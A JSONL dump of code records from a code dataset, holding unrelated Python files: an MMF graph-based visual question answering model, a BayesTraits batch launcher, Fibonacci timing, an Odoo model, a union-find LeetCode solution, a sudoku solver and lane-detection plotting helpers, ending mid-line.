GraphLayer\nfrom mmf.modules.fusions import MCB\n# from mmf.modules.layers import MemoLayer\n# from torch_scatter import scatter_mean\n# from torch_geometric.nn import MetaLayer\nfrom torch import nn\nimport numpy as np\nimport cv2\ntorch.autograd.set_detect_anomaly(True)\n\n\n@registry.register_model(\"gmn\")\nclass GraphMemoNet(MemoNet):\n def __init__(self, config):\n super().__init__(config)\n\n @classmethod\n def config_path(cls):\n return \"configs/models/gmn/defaults.yaml\"\n\n def build(self):\n super().build()\n \n self._build_word_embedding()\n self._init_text_embeddings(\"text\")\n self._init_feature_encoders(\"image\")\n self._init_feature_embeddings(\"image\")\n self._init_GMN()\n self._init_MCB()\n # self._init_memo_layer()\n # self._init_MN(\"image\")\n self._init_combine_layer(\"image\", \"text\")\n self._init_classifier(self._get_classifier_input_dim())\n self._init_extras()\n\n def _init_GMN(self):\n self.visual_graph = GraphLayer(\"image\", hidden_dim=2048, node_dim=2048, edge_dim=2048)\n # self.textual_graph = GraphLayer(\"text\", hidden_dim=2048, node_dim=2048, edge_dim=2048)\n # 1204 2048\n # self.memory = \n\n def _init_MCB(self):\n input_dims = [self.config.mcb.visual_input_dim, self.config.mcb.textual_input_dim]\n output_dim = self.config.mcb.output_dim\n self.mcb = MCB(input_dims, output_dim)\n\n def is_adjcent(self, bbox1, bbox2):\n if ((bbox1==[0,0,0,0]) or (bbox2==[0,0,0,0])):\n adj = False\n else:\n d_ecu_convert = (bbox1[0]+bbox1[2]-bbox2[0]-bbox2[2])*(bbox1[0]+bbox1[2]-bbox2[0]-bbox2[2])+(bbox1[1]+bbox1[3]-bbox2[1]-bbox2[3])*(bbox1[1]+bbox1[3]-bbox2[1]-bbox2[3])\n adj = (d_ecu_convert<1.0)\n return adj\n\n # def _init_memo_layer(self, H, W): \n # self.memo_layer = MemoLayer()\n\n\n def process_text_embedding(\n self, sample_list, embedding_attr=\"text_embeddings\", info=None\n ):\n\n # print(\"=====text embedding=====\")\n\n #metadata\n bs = len(sample_list.question_id) \n num_regions_vg = []\n for i in range(bs):\n num_regions_vg.append(len(sample_list.region_description[\"region_id\"][i]))\n \n text_embeddings = []\n embedding_phrase = [[] for i in range (bs)]\n embedding_phrases = []\n # Get \"text\" attribute in case of \"text_embeddings\" case\n # and \"context\" attribute in case of \"context_embeddings\"\n texts = getattr(sample_list, embedding_attr.split(\"_\")[0])\n phrases = sample_list.region_description[\"phrase\"]\n # print(\"text\", texts.size()) # bs*20*300\n # print(\"phrases\", phrases)\n\n # Get embedding models\n text_embedding_models = getattr(self, embedding_attr)\n for text_embedding_model in text_embedding_models:\n # print(\"text_model\", text_embedding_model)\n '''\n text_model TextEmbedding(\n (module): BiLSTM(\n ...\n )\n )\n '''\n # TODO: Move this logic inside\n if isinstance(text_embedding_model, PreExtractedEmbedding):\n embedding = text_embedding_model(sample_list.question_id)\n else:\n embedding = text_embedding_model(texts)\n # print(\"text_embedding: \", embedding.size()) \n # torch.Size([4(bs), 2048attn/1280gnu])\n for i in range(bs):\n for j in range (num_regions_vg[i]):\n embedding_phrase[i].append(text_embedding_model(phrases[i][j].unsqueeze(0))) \n # print(embedding_phrase[i][j].size()) # torch.Size([1,2048/1280])\n #[50,50,49,49*tensors]\n\n text_embeddings.append(embedding)\n embedding_phrases.append(embedding_phrase) \n \n # cat different embedding models(only 1 model here)\n text_embeddding_total = torch.cat(text_embeddings, dim=1)\n # print(\"text_embedding_tot: \", text_embeddding_total.size()) # torch.Size([4(bs), 2048])\n # embedding_phrase_total = torch.cat(embedding_phrases, dim=0)\n embedding_phrase_total = embedding_phrases # cannot cat a list, [1,4,50/49*[1,2048]]\n # print(len(embedding_phrase_total))\n # print(len(embedding_phrase_total[0]))\n # print(len(embedding_phrase_total[0][0]))\n\n return text_embeddding_total, embedding_phrase_total\n\n \n def process_feature_embedding(\n self, attr, sample_list, text_embedding_total, embedding_phrase_total, extra=None, batch_size_t=None\n ):\n if extra is None:\n extra = []\n feature_embeddings = []\n feature_attentions = [] #useless var\n features = []\n batch_size_t = (\n sample_list.get_batch_size() if batch_size_t is None else batch_size_t\n )\n # print(batch_size_t)\n\n ## metadata\n bs = len(sample_list.question_id) \n num_regions_vg = []\n for i in range(bs):\n num_regions_vg.append(len(sample_list.region_description[\"region_id\"][i]))\n\n ## Convert list of keys to the actual values\n extra = sample_list.get_fields(extra)\n ## bboxes\n bbox_phrase_width = sample_list.region_description[\"width\"]\n bbox_phrase_height = sample_list.region_description[\"height\"]\n bbox_phrase_x = sample_list.region_description[\"x\"]\n bbox_phrase_y = sample_list.region_description[\"y\"]\n bbox_phrase = [[] for i in range (bs)]\n for i in range (bs):\n for j in range (num_regions_vg[i]):\n bbox_phrase[i].append([bbox_phrase_x[i][j], bbox_phrase_y[i][j], bbox_phrase_x[i][j]+bbox_phrase_width[i][j], bbox_phrase_y[i][j]+bbox_phrase_height[i][j]])\n # bbox_phrase_width = torch.tensor(sample_list.region_description[\"width\"]).cuda()\n # bbox_phrase_height = torch.tensor(sample_list.region_description[\"height\"]).cuda()\n # bbox_phrase_x = torch.tensor(sample_list.region_description[\"x\"]).cuda()\n # bbox_phrase_y = torch.tensor(sample_list.region_description[\"y\"]).cuda()\n # bbox_phrase_x1 = torch.add(bbox_phrase_width, bbox_phrase_x)\n # bbox_phrase_y1 = torch.add(bbox_phrase_height, bbox_phrase_y)\n # bbox_phrase = torch.stack(bbox_phrase_x, bbox_phrase_y, bbox_phrase_x1, bbox_phrase_y1)\n # print(\"bbox_phrase\",bbox_phrase)\n bbox_feature = torch.tensor(sample_list.image_info_0[\"bbox\"]).cuda() # [bs, 100, 4] \n # ====print img with bbox==========\n # for i in range (bs):\n # img_src = sample_list.region_description[\"image_url\"][i]\n # cap = cv2.VideoCapture(img_src)\n # if( cap.isOpened() ) :\n # ret,img = cap.read()\n # # cv2.imshow(\"image\",img)\n # # cv2.waitKey()\n # for j in bbox_feature[i]:\n # cv2.rectangle(img, (j[0],j[1]), (j[2],j[3]), (0,255,0), 1)\n # for k in bbox_phrase[i]:\n # p1 = (int(k[0]*sample_list.image_info_0[\"image_width\"][i]),int(k[1]*sample_list.image_info_0[\"image_height\"][i]))\n # p2 = (int(k[2]*sample_list.image_info_0[\"image_width\"][i]),int(k[3]*sample_list.image_info_0[\"image_height\"][i]))\n # print(p1,p2)\n # cv2.rectangle(img, p1, p2, (255,0,0), 1)\n # print(sample_list.region_description[\"image_id\"][i])\n # cv2.imwrite(str(sample_list.region_description[\"image_id\"][i].item())+\".jpg\", img)\n for i in range (bs):\n bbox_feature[i, :, 0] /= sample_list.image_info_0[\"image_width\"][i]\n bbox_feature[i, :, 1] /= sample_list.image_info_0[\"image_height\"][i]\n bbox_feature[i, :, 2] /= sample_list.image_info_0[\"image_width\"][i]\n bbox_feature[i, :, 3] /= sample_list.image_info_0[\"image_height\"][i]\n # print(\"bbox_feature\", bbox_feature)\n\n feature_idx = 0\n\n # Get all of the features, which are in the form, \"image_feature_0\"\n # \"image_feature_1\" ...\n while True:\n feature = getattr(sample_list, f\"{attr}_feature_{feature_idx:d}\", None)\n if feature is None:\n break\n # print(\"feature_idx\", feature_idx)\n # print(\"feature1\", feature.size()) # torch.Size([4, 100/196, 2048])\n feature_idx += 1\n feature = feature[:batch_size_t]\n # print(\"feature2\", feature.size())\n features.append(feature)\n\n feature_encoders = getattr(self, attr + \"_feature_encoders\")\n\n # print(\"=====feat encoding=====\")\n # print(\"feat_encoders\", feature_encoders)\n # result: \n # feat_encoders ModuleList(\n # (0): ImageFeatureEncoder(\n # (module): FinetuneFasterRcnnFpnFc7(\n # (lc): Linear(in_features=2048, out_features=2048, bias=True)\n # )\n # )\n # (1): ImageFeatureEncoder(\n # (module): Identity()\n # )\n # )\n\n \n\n # Each feature should have a separate image feature encoders\n assert len(features) == len(feature_encoders), (\n \"Number of feature encoders, {} are not equal \"\n \"to number of features, {}.\".format(len(feature_encoders), len(features))\n )\n\n # Now, iterate to get final attended image features\n encoded_feature = []\n for i, feature in enumerate(features):\n # Get info related to the current feature. info is generally\n # in key of format \"image_info_0\" for 0th feature\n feature_info = getattr(sample_list, f\"{attr}_info_{i:d}\", {})\n # print(\"feature_i: \", i, feature.size()) # torch.Size([4, 100/196, 2048])\n # print(\"feature_info\", feature_info) # {}\n \n # For Pythia, we need max_features to mask attention\n feature_dim = getattr(feature_info, \"max_features\", None)\n if feature_dim is not None:\n feature_dim = feature_dim[:batch_size_t]\n # print(\"feat_dim\", feature_dim) # none\n\n # Attribute in which encoders are saved, for \"image\" it\n # will be \"image_feature_encoders\", other example is\n # \"context_feature_encoders\"\n encoders_attr = attr + \"_feature_encoders\"\n feature_encoder = getattr(self, encoders_attr)[i]\n # Encode the features\n encoded_feature.append(feature_encoder(feature)) \n\n # print(\"encoded_feat:\", i, encoded_feature.size()) # torch.Size([64, 100/196, 2048])\n #feature1--finetune; feat2--identity\n list_attr = attr + \"_feature_embeddings_list\"\n feature_embedding_models = getattr(self, list_attr)[i] # image_feature_embeddings_list\n\n \n # print(\"=====feat_embedding===== \")\n # Forward through these embeddings one by one\n # current data: encoded_feature[0,1], text_embedding_total, embedding_phrase total, feature_dim, extra, bbox_phrase, bbox_feature\n \n # init graph data\n visual_node_features = [[] for i in range (bs)]\n textual_node_features = [[] for i in range (bs)]\n visual_edge_ends = [[] for i in range (bs)]\n textual_edge_ends = [[] for i in range (bs)]\n visual_edge_features = [[] for i in range (bs)]\n textual_edge_features = [[] for i in range (bs)]\n\n visual_edge_feat_dim = 2048 # 2048\n textual_edge_feat_dim = 2048 # 2048\n\n visual_global_features = encoded_feature[1][:,0,:]\n textual_global_features = text_embedding_total\n\n ## visual graph init\n for i in range(bs):\n for j in range (len(encoded_feature[0][i])):\n # j-th feature in i-th batch\n # print(\"mcb\", encoded_feature[0][i][j].size(), text_embedding_total[i].size()) # torchsize([2048])\n visual_node_features[i].append((self.mcb( [encoded_feature[0][i][j], text_embedding_total[i]] )).unsqueeze(0)) # [bs, 100, 2048]\n for k in range(len(bbox_feature[i])):\n if self.is_adjcent(bbox_feature[i][j], bbox_feature[i][k]):\n visual_edge_ends[i].append([j,k]) # [bs, num_edges, 2]\n visual_edge_features[i].append(torch.zeros(1,visual_edge_feat_dim))# [bs, num_edges, 2048] \n visual_edge_features[i] = torch.cat(visual_edge_features[i]).cuda(0)\n visual_node_features[i] = torch.cat(visual_node_features[i])\n # visual_nodes[i] = VisualNodeModel(visual_node_features[i])\n # visual_edges[i] = VisualEdgeModel()\n\n ## textual graph init\n # print(embedding_phrase_total[i]) # [1,4,50/49,2048]\n embedding_phrase_total[0][i]=torch.cat(embedding_phrase_total[0][i], dim = 0)\n # print(\"embedding_phrase_total\", embedding_phrase_total[0][0].size())\n # print(\"text_embedding_total\", text_embedding_total[i].size()) \n textual_node_features[i]= (embedding_phrase_total[0][i]*text_embedding_total[i]).unsqueeze(0) # [49, 2048] * [2048] =>[49,2048]\n # textual_node_features = torch.mmf(embedding_phrase_total,text_embedding_total)\n # print(\"num_regions_vg\", num_regions_vg[i], len(bbox_phrase[i]))\n ## edge init\n for j in range (num_regions_vg[i]):\n # textual_node_features[i].append(multiply(embedding_phrase_total[i][j], text_embedding_total[i]))\n for k in range (len(bbox_phrase[i])):\n if self.is_adjcent(bbox_phrase[i][j], bbox_phrase[i][k]):\n textual_edge_ends[i].append([j,k]) # [bs, num_edges, 2]\n textual_edge_features[i].append(torch.zeros(1,textual_edge_feat_dim))# [bs, num_edges, 2048]\n textual_edge_features[i] = torch.cat(textual_edge_features[i]).cuda(0)\n # textual_nodes[i] = TextualNodeModel(extual_node_features[i])\n # textual_edges[i] = TextualEdgeModel()\n # \n visual_node_features[i], visual_edge_features[i], visual_global_features[i] = self.visual_graph(visual_node_features[i], visual_edge_ends[i], visual_edge_features[i], visual_global_features[i])\n # textual_node_features[i], textual_edge_features[i], textual_global_features[i] = self.textual_graph(textual_node_features[i], textual_edge_ends[i], textual_edge_features[i], textual_global_features[i])\n # visual_node_features, visual_edge_features, visual_global_features = self.visual_graph(visual_node_features, visual_edge_ends, visual_edge_features, visual_global_features)\n # textual_node_features, textual_edge_features, textual_global_features = self.textual_graph(textual_node_features, textual_edge_ends, textual_edge_features, textual_global_features)\n\n # print(\"len vis node feat\", len(visual_node_features)) #[4*[100, 2048]]\n # print(\"vis node feat[0]\", visual_node_features[1].size())\n a = torch.cat(visual_node_features, dim = 0).reshape(len(visual_node_features),100,2048)\n encoded_feature[0] = a\n # print(encoded_feature[0].size())\n\n for i, feature in enumerate(features):\n for feature_embedding_model in feature_embedding_models:\n inp = (encoded_feature[i], text_embedding_total, feature_dim, extra)\n # torch.Size([64, 100, 2048]), [64,2048], none, samplelist()\n # print(feature_embedding_model) #attn & identity as listed in yml\n # print(encoded_feature[i].size())\n # print(text_embedding_total.size())\n # print(\"erxtra\", extra) # infos in samplelist with key extra \n\n embedding, attention = feature_embedding_model(*inp)\n \n # out = self.GMNs[i](encoded_feature, text_embedding_total, embedding_phrase_total, )\n # memo = self.MNs[i](encoded_feature, text_embedding_total, embedding_phrase_total) # torch.Size([bs, 2048])\n # memo = self.MNs[i](encoded_feature_512, text_embedding_total) # torch.Size([bs, 2048])\n # print(\"memo:\", memo.size()) \n # print(\"embedding\", embedding.size())\n\n # embedding_memo_superpos = embedding + memo\n # feature_embeddings.append(embedding_memo_superpos)\n # feature_embeddings.append(memo)\n feature_embeddings.append(embedding)\n\n # Concatenate all features embeddings and return along with attention\n feature_embedding_total = torch.cat(feature_embeddings, dim=1)\n\n # print(\"feature_embeddings_tot\", feature_embedding_total.size()) #[bs*4096]\n\n return feature_embedding_total, feature_attentions \n\n def get_optimizer_parameters(self, config):\n combine_layer = self.image_text_multi_modal_combine_layer\n params = [\n {\"params\": self.word_embedding.parameters()},\n {\"params\": self.image_feature_embeddings_list.parameters()},\n {\"params\": self.text_embeddings.parameters()},\n {\"params\": self.mcb.parameters()},\n {\"params\": self.visual_graph.parameters()},\n # {\"params\": self.textual_graph.parameters()},\n {\"params\": combine_layer.parameters()},\n {\"params\": self.classifier.parameters()},\n {\n \"params\": self.image_feature_encoders.parameters(),\n \"lr\": (config.optimizer.params.lr * 0.1),\n },\n ]\n\n return params\n\n def print_sample_list(self, sample_list):\n print (\"=====sample_list=====\")\n print(sample_list.fields())\n for key in sample_list.keys():\n print(key+\":\")\n # print(type(sample_list[key]))\n if isinstance(sample_list[key],str) :\n print(\"str:\", sample_list[key])\n elif isinstance(sample_list[key],dict) : # region description: dict\n for key2 in sample_list[key].keys():\n print(\" \"+key2+\":\")\n # if type(sample_list[key][key2]) is np.ndarray:\n # print(sample_list[key][key2].shape)\n # else:\n # print(sample_list[key][key2])\n print(sample_list[key][key2])\n elif isinstance(sample_list[key],list) :\n for i in sample_list[key]: # image info 1: [none, ]\n if i != None:\n print(i.keys(), i.values)\n else: \n print (i)\n else: \n print(sample_list[key].size())\n\n\n def forward(self, sample_list):\n # self.print_sample_list(sample_list)\n\n ## metadata\n bs = len(sample_list.question_id) \n num_regions_vg = []\n for i in range(bs):\n num_regions_vg.append(len(sample_list.region_description[\"region_id\"][i]))\n # print(\"num_regions_vg\", num_regions_vg)\n\n ## question & caption word embedding(word->300D vec)\n # print(\"text\", sample_list.text) #tensor[4,20]\n sample_list.text = self.word_embedding(sample_list.text)\n # print(\"text\", sample_list.text.size()) # torch.Size([4, 20, 300])\n for i in range(bs):\n for j in range (num_regions_vg[i]):\n # [[50,20],[50,20],[49,20][49,20]]\n sample_list.region_description[\"phrase\"][i][j] = torch.tensor(sample_list.region_description[\"phrase\"][i][j]).cuda() #torch.Size([20])\n sample_list.region_description[\"phrase\"][i][j] = self.word_embedding(sample_list.region_description[\"phrase\"][i][j]) #torch.Size([20, 300])\n \n # question & caption GRU embedding\n text_embedding_total, embedding_phrase_total = self.process_text_embedding(sample_list)\n # print(\"text_embedding\", text_embedding_total.size())\n\n # image feat\n image_embedding_total, _ = self.process_feature_embedding(\n \"image\", sample_list, text_embedding_total, embedding_phrase_total\n )\n # print(\"img_embedding\", image_embedding_total.size())\n \n if self.inter_model is not None:\n image_embedding_total = self.inter_model(image_embedding_total)\n \n # print(\"image_embedding\", image_embedding_total.size()) # [batch*4096]\n # print(\"text_embedding:\" , image_embedding_total.size()) # [batch*4096]\n\n # print(\"=======memory======\")\n\n # print(\"=====combine layer=====\")\n \n joint_embedding = self.combine_embeddings(\n [\"image\", \"text\"], [image_embedding_total, text_embedding_total]\n )\n\n # print(\"joint_embedding:\", joint_embedding.size()) # [batch*5000]\n\n model_output = {\"scores\": self.calculate_logits(joint_embedding)}\n\n # print(\"model_output:\", model_output['scores'].size())\n # for name, param in self.MNs.named_parameters():\n # print (name, param)\n\n return model_output\n\n","sub_path":"mmf/models/gmn.py","file_name":"gmn.py","file_ext":"py","file_size_in_byte":21716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"96781315","text":"import os\n\npath_to_data = './data/pheno/'\n\n\nif __name__ == '__main__':\n for (dirpath, dirnames, filenames) in os.walk(path_to_data):\n for filename in filenames:\n name = filename[0:-6]\n os.system('nohup ./BayesTraitsV3 ' + name + '.nexus ' + name + '.pheno < config.txt > ' + name + '.out 2>> ' + name + '.out &')\n","sub_path":"bayes_traits/run_bayes_traits.py","file_name":"run_bayes_traits.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431760526","text":"import time\nimport multiprocessing\nfrom functools import lru_cache\n\n@lru_cache(maxsize=1024)\ndef fib(n):\n if n < 0:\n raise ValueError\n if n < 2:\n return n\n return fib(n-1)+fib(n-2)\n \ndef fibonacci(n):\n start = time.time()\n res = fib(n)\n end = time.time()\n return res\n \ndef main():\n start = time.time()\n for i in range(30, 37):\n res = fibonacci(i)\n end = time.time() \n print(\"fib(%3d) = %7d (took %0.3fs)\" % (i, res, (end-start)))\n end = time.time() \n print(\"Total time: %0.3fs\" % (end - start)) \n \nif __name__ == \"__main__\": main()\n","sub_path":"kemptyslots/fib_m.py","file_name":"fib_m.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487688153","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import *\nfrom odoo.tools.misc import format_date\nfrom datetime import datetime, timedelta\n\n\nclass ExperimentalAbstractItem(models.AbstractModel):\n _name = 'abstract.experimental.item'\n\n reference_no = fields.Char()\n event_trap = {}\n\n # Sets the Reference No for this record item\n @api.one\n def set_reference_no(self):\n new_ref = ''\n if (not self.reference_no) or (self.reference_no == ''):\n new_ref = self.env['ir.sequence'].next_by_code('experimentation.numbers')\n self.reference_no = new_ref\n return new_ref\n\n @api.model\n def create(self, vals):\n ni = super(ExperimentalAbstractItem, self).create(vals)\n if not ni.reference_no:\n ni.set_reference_no()\n vals['ref_no'] = ni.reference_no\n vals['res_model'] = self._name\n vals['res_id'] = ni.id\n return ni\n\n def copy_item(self, vals={}):\n vals['reference_no'] = self.reference_no\n return vals\n\n @api.one\n def write(self, vals):\n vals = super(ExperimentalAbstractItem, self).write(vals)\n # Should be written to fields now and ready to test for events\n self._run_event_traps()\n return vals\n\n @api.one\n def _set_event_trap(self, event_trap, event_data):\n trap_item = dict\n trap_item[event_trap] = event_data\n self.event_trap.append(event_trap)\n\n @api.one\n def _run_event_traps(self):\n if 'recalculate' in self.event_trap:\n self.on_recalculate()\n self.event_trap['recalculate'] = False\n\n if 'recording' in self.event_trap:\n self.on_recording()\n self.event_trap['recording'] = False\n\n if 'experimentation' in self.event_trap:\n self.on_experimentation()\n self.event_trap['experimentation'] = False\n\n if 'status' in self.event_trap:\n self.on_experimentation()\n self.event_trap['status'] = False\n return\n\n @api.one\n def on_recalculate(self):\n print('here i am')\n return\n\n @api.one\n def on_recording(self):\n return\n\n @api.one\n def event_recalculate(self):\n self.event_trap['recalculate'] = True\n return\n\n @api.one\n def event_recording(self):\n self.event_trap['recording'] = True\n return\n\n @api.one\n def event_experimentation(self):\n self.event_trap['experimentation'] = True\n return\n\n @api.one\n def event_status(self):\n self.event_trap['status'] = True\n return\n","sub_path":"rd_tool/models/old/experimental_item.py","file_name":"experimental_item.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332681458","text":"# https://leetcode-cn.com/problems/friend-circles/\n\nclass Solution:\n def findCircleNum(self, M: List[List[int]]) -> int:\n '''DFS,对对角线做dfs即可'''\n def dfs(visited, i):\n for j in range(len(M)):\n if M[i][j] == 1 and j not in visited:\n visited.add(j)\n dfs(visited, j)\n visited = set()\n ret = 0\n for i in range(len(M)):\n if i not in visited:\n dfs(visited, i)\n ret += 1\n return ret\n '''并查集'''\n# self.p = [i for i in range(len(M))]\n# for i in range(len(M)):\n# for j in range(len(M)):\n# if M[i][j] == 1: self.union(i, j)\n# res = set()\n# for i in self.p:\n# res.add(self.find(i))\n# return len(res)\n \n# def union(self, i, j):\n# p1 = self.find(i)\n# p2 = self.find(j)\n# self.p[p1] = p2\n\n# def find(self, i):\n# root = i\n# while self.p[root] != root:\n# root = self.p[root]\n# while self.p[i] != i: # 路径压缩\n# self.p[i], i = root, self.p[i]\n# return root\n '''并查集2 - 自己写的'''\n p = [i for i in range(len(M))]\n def union(i, j):\n p1 = find(i)\n p2 = find(j)\n p[p1] = p2\n def find(i):\n root = i\n while root != p[root]: root = p[root]\n while i != p[i]: p[i], i = root, p[i]\n return i\n for i in range(len(M)):\n for j in range(len(M)):\n if M[i][j] == 1: union(i, j)\n return len(set(find(i) for i in p))","sub_path":"Week_08/Homeworks/547. 朋友圈.py","file_name":"547. 朋友圈.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564240898","text":"\"\"\"\nThis program implements the solution of the well-known puzzle game Sudoku.\nAny interested can use his example of not yet unsolved sudoku and try it.\nOtherwise, it's possible to use our example of board.\n\"\"\"\n\nclass SudokuSolver():\n \"\"\"\n This class takes an input of a sudoku board. \n The board must be in the form of list of lists. Zeros in this matrix will mean \n numbers the program needs to find.\n \"\"\"\n def __init__(self,board):\n self.board = board\n\n def empty_cell(self):\n \"\"\"\n Returns the position of the first found empty cell.\n Returns None in case of the occupied board.\n \"\"\"\n for i in range(len(self.board)):\n for j in range(len(self.board[0])):\n if self.board[i][j] == 0:\n return [i,j]\n return None\n\n def number_check(self,value,loc):\n \"\"\"\n Checks if a value is valid for this position.\n Looks through the row, the column and 3x3 block of\n given cell.\n\n Returns: \n True in case of validity\n False otherwise.\n \"\"\"\n for i in range(len(self.board[0])): #Check row\n if self.board[loc[0]][i] == value and i != loc[1]:\n return False\n\n for j in range(len(board)): #Check column\n if self.board[j][loc[1]] == value and j != loc[0]:\n return False\n\n block_x = loc[1] // 3\n block_y = loc[0] // 3\n for y in range(block_y * 3, block_y * 3 + 3):#Check 3x3 block\n for x in range(block_x * 3, block_x * 3 + 3):\n if self.board[y][x] == value and [y,x] != loc:\n return False\n\n return True\n \n def sudoku_show(self):\n \"\"\"\n Prints the sudoku board.\n \"\"\"\n for i in range(len(self.board)):\n if i%3 == 0 and i != 0:\n print(\"- - - - - - - - - -\")\n for j in range(len(self.board[i])):\n if j%3 == 0 and j != 0:\n print(\"|\",end = \"\")\n if j > 7:\n print(self.board[i][j])\n else:\n print(self.board[i][j],end = \" \")\n \n def solve(self):\n \"\"\"\n Attempts to solve the board by inserting into an empty cell\n a digit. If it suits, the function proceeds to find empty cells.\n In case of not solvable situation, it will nullify the original cell\n and assign it a new digit.\n\n Returns:\n True: all cells are solved rightly.\n False: given value is wrong. Need to backtrack to the original\n cell.\n \"\"\"\n self.empty = self.empty_cell()\n if not self.empty:\n return True\n\n res = False\n y,x = self.empty\n nums = list(range(1,10))\n\n for n in nums:\n if self.number_check(n,[y,x]):\n self.board[y][x] = n\n if self.solve():\n res = True\n else:\n self.board[y][x] = 0\n res = False\n return res\n\n\nboard1 = [\n [7,8,0,4,0,0,1,2,0],\n [6,0,0,0,7,5,0,0,9],\n [0,0,0,6,0,1,0,7,8],\n [0,0,7,0,4,0,2,6,0],\n [0,0,1,0,5,0,9,3,0],\n [9,0,4,0,6,0,0,0,5],\n [0,7,0,3,0,0,0,1,2],\n [1,2,0,0,0,7,4,0,0],\n [0,4,9,2,0,6,0,0,7]\n]\nboard = [\n [0,7,3,8,0,0,2,9,0],\n [0,0,2,3,0,0,0,0,0],\n [0,0,1,6,0,0,0,0,0],\n [0,6,0,7,0,3,1,8,0],\n [0,0,0,0,0,0,0,0,5],\n [0,3,0,0,0,1,7,2,0],\n [9,1,0,0,0,0,0,5,3],\n [3,8,0,1,0,0,0,7,2],\n [0,0,0,0,3,0,6,0,0]\n]\n\n\nif __name__ == '__main__':\n sud = SudokuSolver(board)\n print('Starting board')\n print('\\n')\n sud.sudoku_show()\n print('--------------------')\n print('\\n')\n print('Solved board')\n print('\\n')\n sud.solve()\n sud.sudoku_show()\n","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49849237","text":"from typing import Optional\n\n\ndef _define_numerical_dict(dict_: Optional[dict]) -> Optional[dict]:\n \"\"\"\n Takes a dictionary and checks if all values in dictionary are integers and floats.\n Can take None as argument.\n\n Args:\n the_dict: Dict to perform check against\n\n Raises:\n ValueError: If all values of dict are not int or float\n TypeError: When argument type is not dict\n\n Returns:\n None or the dict\n \"\"\"\n\n if not dict_:\n dict_ = dict_\n\n elif isinstance(dict_, dict):\n if not all([isinstance(x, (float, int)) for x in dict_.values()]):\n raise ValueError(\"All values in the dictionary must be integer or float\")\n\n else:\n raise TypeError(\"The parameter can only take a dictionary or None\")\n\n return dict_\n","sub_path":"feature_engine/parameter_checks.py","file_name":"parameter_checks.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425714147","text":"import random\n\nimport numpy as np\nimport pickle\nfrom cv2 import polylines, circle\nfrom scipy.optimize import linear_sum_assignment\nfrom sklearn.metrics import classification_report\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef sigmoid(value):\n if -value > np.log(np.finfo(type(value)).max):\n return 0.0\n a = np.exp(-value)\n return 1.0/ (1.0 + a)\n\ndef plot_redy_line(x,y, config):\n y_f = y\n # y_f, x_t = x.copy(), y_f.copy() # for ratoation\n x_t = np.array(x)* config.img_h\n y_f = np.array(y_f)* config.img_h\n return x_t, y_f\n\ndef iterate_and_validate_predictions_cells(prediction, gt, cfg):\n\n y_tr_roc = []\n y_pr_roc = []\n error = []\n\n for i, s in enumerate(prediction):\n for a in s:\n a_pre, b_pre, c_pre, conf, = a\n\n x = np.arange(-cfg.grich_anchor_pt, cfg.grich_anchor_pt, 1 / cfg.num_of_samples)\n conf_true = gt[i, k, l, a, -1]\n\n if conf_true:\n y_tr_roc.append(True)\n a_pre = a_pre * cfg.a_range + cfg.a_shift\n b_pre = b_pre * cfg.b_range + cfg.b_shift\n c_pre = c_pre * cfg.c_range + cfg.c_shift\n y_f = np.round(a_pre * x ** 2 + b_pre * x + c_pre)\n error.append((y_f - gt[i, k, l, a, :-1])**2) ## square error\n else:\n y_tr_roc.append(False)\n\n conf = sigmoid(conf)\n y_pr_roc.append(conf)\n\n y_tr_roc = np.asarray(y_tr_roc)\n y_pr_roc = np.asarray(y_pr_roc)\n error = np.asarray(error)\n\n return y_tr_roc, y_pr_roc, error\n\ndef class_report(y_tr_roc, y_pr_class, threshold):\n y_pr_class = y_pr_class.copy()\n for i,s in enumerate(y_pr_class):\n if s >= threshold:\n y_pr_class[i] = True\n else:\n y_pr_class[i] = False\n print(classification_report(y_tr_roc, y_pr_class))\n\ndef rgb_color(a):\n if a == 0:\n return (255,0,0)\n if a == 1:\n return (0,255,0)\n if a == 2:\n return (0,0,255)\n\ndef plot_image(pred, config, with_print= False):\n filename_cent = config.DIR + config.experiment_name + '/cluster_cent.sav'\n cluster_cent = pickle.load(open(filename_cent, 'rb'))\n plot_image = np.zeros((config.img_w, config.img_w), dtype=np.float32)\n if with_print:\n print('-----------------------New Prediction---------------------------------------')\n for a in range(config.num_prediction_cells):\n a_ko, b, c,min_x,mid_x, max_x, conf = pred[a, :]\n # sc = sigmoid(sc)\n conf = sigmoid(conf)\n\n\n if conf >= config.conf_thr:\n\n a_ko = a_ko #* config.a_range + config.a_shift\n b = b #* config.b_range + config.b_shift\n c = c #* config.c_range + config.c_shift\n x_pred = np.array([min_x,mid_x, max_x])\n y_f = np.array([a_ko,b, c])\n #y_f = a_ko * x_pred ** 2 + b * x_pred + c\n y_f, x_t = plot_redy_line(y_f, x_pred, config)\n y_f = y_f + cluster_cent[a][0]\n x_t = x_t + cluster_cent[a][1]\n\n #y_f = y_f + config.img_h //2\n #x_t = x_t + config.img_h //2\n f = np.array([x_t, y_f]).T\n\n\n if with_print:\n #print('Score ' + ' a: ' + str(a_ko) + ' b: ' + str(b) + ' c: ' + str(c) + ' conf: ' + str(\n # conf)+ 'min: ' +str(min_x)+ 'max: ' +str(max_x)) # + ' Fit correct:' + str(fit_t) + ' Fit wrong:' + str(fit_f))\n print(' conf: ' + str(conf)+ 'min: ' +str(x_t[0])+ 'max: ' +str(x_t[-1])) # + ' Fit correct:' + str(fit_t) + ' Fit wrong:' + str(fit_f))\n plot_image = polylines(plot_image, np.int32([f]), 